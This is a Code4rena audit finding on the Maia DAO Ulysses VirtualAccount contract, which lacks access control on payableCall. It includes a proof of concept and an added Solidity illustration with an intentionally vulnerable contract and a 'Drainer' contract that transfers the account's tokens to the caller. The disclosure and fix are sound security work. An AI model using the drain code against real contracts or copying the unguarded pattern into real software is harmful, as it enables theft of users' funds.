Maia DAO - Ulysses - tank's results

Harnessing the power of Arbitrum, Ulysses Omnichain specializes in Virtualized Liquidity Management.

General Information

Platform: Code4rena

Start Date: 22/09/2023

Pot Size: $100,000 USDC

Total HM: 15

Participants: 175

Period: 14 days

Judge: alcueca

Total Solo HM: 4

Id: 287

League: ETH

Researcher Performance

Rank: 163/175

Findings: 1

Award: $0.11

🌟 Selected for report: 0

🚀 Solo Findings: 0

Lines of code

https://github.com/code-423n4/2023-09-maia/blob/main/src/VirtualAccount.sol#L85-L112

Vulnerability details

Impact

An attacker can steal every asset held by a VirtualAccount. Every other function in VirtualAccount is gated by the requiresApprovedCaller modifier, but function payableCall(PayableCall[] calldata calls) public payable returns (bytes[] memory returnData) (ref: https://github.com/code-423n4/2023-09-maia/blob/main/src/VirtualAccount.sol#L85) is not. Any address can therefore make the account call any contract with arbitrary calldata, for example to transfer out the NFTs or ERC20 tokens it holds.

Proof of Concept

The low-level call at https://github.com/code-423n4/2023-09-maia/blob/main/src/VirtualAccount.sol#L101 forwards _call.target and _call.callData as supplied by the caller, so an attacker can submit a single PayableCall with:

  • _call.target = USDC
  • _call.callData = abi.encodeWithSelector(IERC20.transfer.selector, <attacker address>, <amount>)

Because the call is executed by the VirtualAccount itself, the token contract sees the account as msg.sender and moves its full balance to the attacker.

Tools Used

  • manual review

Recommended Mitigation Steps

  • add the requiresApprovedCaller modifier to payableCall
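The following is an added illustration of the finding and its fix, not code from the audited repository. It shows a simplified VirtualAccount whose batch executor is exposed once without access control (the reported state) and once behind a requiresApprovedCaller modifier (the recommended mitigation), plus the attacker's payload from the proof of concept. The approval check (account owner or an address in an approved-router mapping) is an assumed stand-in for the real modifier, and the contract names and setRouter helper are hypothetical.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

// Added illustration for this finding; this is NOT the audited VirtualAccount.sol.
// The approval check below (user address + approved-router mapping) is an assumed
// simplification of the real requiresApprovedCaller modifier.

interface IERC20 {
    function transfer(address to, uint256 amount) external returns (bool);
}

struct PayableCall {
    address target;
    bytes callData;
    uint256 value;
}

abstract contract VirtualAccountBase {
    address public immutable userAddress;
    mapping(address => bool) public approvedRouter;

    error UnauthorizedCaller();
    error CallFailed();

    constructor(address user) { userAddress = user; }

    // Assumed check: only the account owner or an approved router may act.
    modifier requiresApprovedCaller() {
        if (msg.sender != userAddress && !approvedRouter[msg.sender]) revert UnauthorizedCaller();
        _;
    }

    // Hypothetical helper so the owner can whitelist a router.
    function setRouter(address router, bool ok) external {
        if (msg.sender != userAddress) revert UnauthorizedCaller();
        approvedRouter[router] = ok;
    }

    receive() external payable {}

    // Executes each call from the account's own context (msg.sender == this account),
    // so any token or NFT held here can be moved by whoever reaches this code path.
    function _batchCall(PayableCall[] calldata calls) internal returns (bytes[] memory returnData) {
        uint256 valAccumulator;
        returnData = new bytes[](calls.length);
        for (uint256 i = 0; i < calls.length; ++i) {
            PayableCall calldata c = calls[i];
            valAccumulator += c.value;
            (bool success, bytes memory ret) = c.target.call{value: c.value}(c.callData);
            if (!success) revert CallFailed();
            returnData[i] = ret;
        }
        if (msg.value != valAccumulator) revert CallFailed();
    }
}

// Before: payableCall carries no modifier, so any address can drive the account.
contract VulnerableVirtualAccount is VirtualAccountBase {
    constructor(address user) VirtualAccountBase(user) {}

    function payableCall(PayableCall[] calldata calls) public payable returns (bytes[] memory) {
        return _batchCall(calls);
    }
}

// After: the same function gated by requiresApprovedCaller, as the report recommends.
contract FixedVirtualAccount is VirtualAccountBase {
    constructor(address user) VirtualAccountBase(user) {}

    function payableCall(PayableCall[] calldata calls)
        public payable requiresApprovedCaller returns (bytes[] memory)
    {
        return _batchCall(calls);
    }
}

// The attacker's payload from the proof of concept: one PayableCall whose target is the
// token contract and whose calldata is transfer(attacker, amount). Against the vulnerable
// account this drains the balance; against the fixed one it reverts with UnauthorizedCaller.
contract Drainer {
    function drain(address victim, address token, uint256 amount) external {
        PayableCall[] memory calls = new PayableCall[](1);
        calls[0] = PayableCall({
            target: token,
            callData: abi.encodeWithSelector(IERC20.transfer.selector, msg.sender, amount),
            value: 0
        });
        // Both accounts expose the same payableCall ABI, so one caller type serves for either.
        VulnerableVirtualAccount(payable(victim)).payableCall(calls);
    }
}
```

The point of the two-contract layout is that the executor body is identical in both; the only difference is the modifier on the public entry point, which is exactly what the mitigation adds. Deploying Drainer against each account in a local test (for example with Foundry) shows the token balance moving in the vulnerable case and the UnauthorizedCaller revert in the fixed one.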

Assessed type

Access Control

#0 - c4-pre-sort

2023-10-08T14:04:19Z

0xA5DF marked the issue as duplicate of #888

#1 - c4-pre-sort

2023-10-08T14:37:20Z

0xA5DF marked the issue as sufficient quality report

#2 - c4-judge

2023-10-26T11:29:15Z

alcueca marked the issue as satisfactory
